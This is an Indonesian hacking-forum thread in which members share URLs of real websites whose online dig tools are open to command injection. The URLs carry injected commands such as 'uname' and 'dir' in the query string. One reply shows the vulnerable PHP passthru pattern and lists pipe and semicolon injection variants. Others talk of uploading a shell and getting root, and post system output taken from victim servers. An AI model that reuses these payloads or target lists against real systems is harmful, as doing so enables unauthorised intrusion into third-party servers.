Threaded Mode | Linear Mode

***mywisdom*** · (This post was last modified: 06-17-2011 06:42 AM by mywisdom.)

http://carlxp.getmyip.com:8000/dns/?ns=;...us=digging
http://ip.grvt.net/dns/dig.php?ns=||dir|...us=digging
http://mintpalace.net/dnstools/dig.php?n...us=digging
http://www.dns.th.la/index.php?ns=||unam...us=digging
http://www.acptele.com/dnstools.2.dns/di...us=digging

[Image: gwhacker.gif]

bie_cat · 06-17-2011, 06:17 AM

apaan tuh om???
aye kagak ngerti/// suram

tian hv · 06-17-2011, 06:17 AM

ini diapain ya om..??
maklum ane bukan hacker.. nohope

kasih tutor dikit omz dom..

~c()k3~ · 06-17-2011, 06:18 AM

loh.. kog php digger.. caranya gmna gangerti

darkdante · (This post was last modified: 06-17-2011 06:40 AM by darkdante.)

itu remote command execution om2, kalo mao lebih detail bisa liat artikel om wenkhairu di mari:
http://devilzc0de.org/forum/thread-4545.html

klo singkatnya misal ada kode php:
<?php
passthru("dig ".$inputan_dari_user);
?>
nah karena inputan user dikasih pipa misal:
<?php
$inputan_dari_user="google.com | uname -a";
passthru("dig ".$inputan_dari_user);
?>
maka perintah setelah tanda pipa : |
bisa dieksekusi kalo ga difilter

variasi nginputnya :
|perintah|
||perintah||
;perintah
;perintah||
;perintah|
\|perintah|

**zal_freaks** · (This post was last modified: 06-17-2011 07:41 AM by zal_freaks.)

Makasih Om Dom .. . [Image: m185.gif]

p0pc0rn · 06-17-2011, 08:05 AM

mantap om
ini vuln yang jarang dijumpai
code execution.
ga perlu diinjek masuk shell lagi..udah bisa lakukan command2

***eidelweiss*** · (This post was last modified: 06-17-2011 01:41 PM by eidelweiss.)

(06-17-2011 08:05 AM)p0pc0rn Wrote: mantap om
ini vuln yang jarang dijumpai
code execution.
ga perlu diinjek masuk shell lagi..udah bisa lakukan command2

ia om malah bisa lgsg upload shell terus take over
dapet root dech santai

Code:

http://www.acptele.com/data/data.php

Uname -a: Linux denhaag.pianetaedizioni.com 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009

http://grvt.net/phpinfo.php

Uname -a: Linux aries.etc-host.com 2.6.18-194.32.1.el5 #1

seva · 06-17-2011, 01:58 PM

yanzbatara · 06-17-2011, 02:21 PM

ualah mesti banyak belajar

nih...

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[Ask] Knp ya susah nemu halaman admin! trs passwordnya kgk bisa di MD5!!	AaronTatum80	15	519	08-03-2012 08:38 AM Last Post: sh4r3ck
	halaman situs saya kena hack	fakhri	28	1,174	03-29-2012 08:17 AM Last Post: kodok
	Ada Vuln Di Situs Pemerintah	Cucantooo	6	304	03-18-2012 12:52 PM Last Post: KotoM
	sql injection di situs go.id pake tools :-p [showcase]	ketek	63	3,349	02-21-2012 01:52 AM Last Post: ketek
	Lagi jalan2 nemu halaman admin	nangkelande	21	636	01-09-2012 05:03 AM Last Post: R3d Cyb3r
	Analisa dari kaskus,tentang siapa yg bobol situs polri.go.id	akatsuki	38	1,191	07-07-2011 03:09 PM Last Post: githanurul
	Nemu lfi gan monggo dilanjut	mywisdom	10	265	05-30-2011 07:57 PM Last Post: PrOReBeLL
	lfi2 silahkan dilanjut gan	mywisdom	22	421	05-14-2011 10:15 PM Last Post: bi0zcode
	[Tutor] 2 situs go.id vulnerable to Arbitrary File Download	p0pc0rn	21	611	05-02-2011 09:51 PM Last Post: Ridho_Cupu_Aja
	Nemu LFI di Malaysia	android2009	20	711	05-01-2011 04:07 PM Last Post: mariachi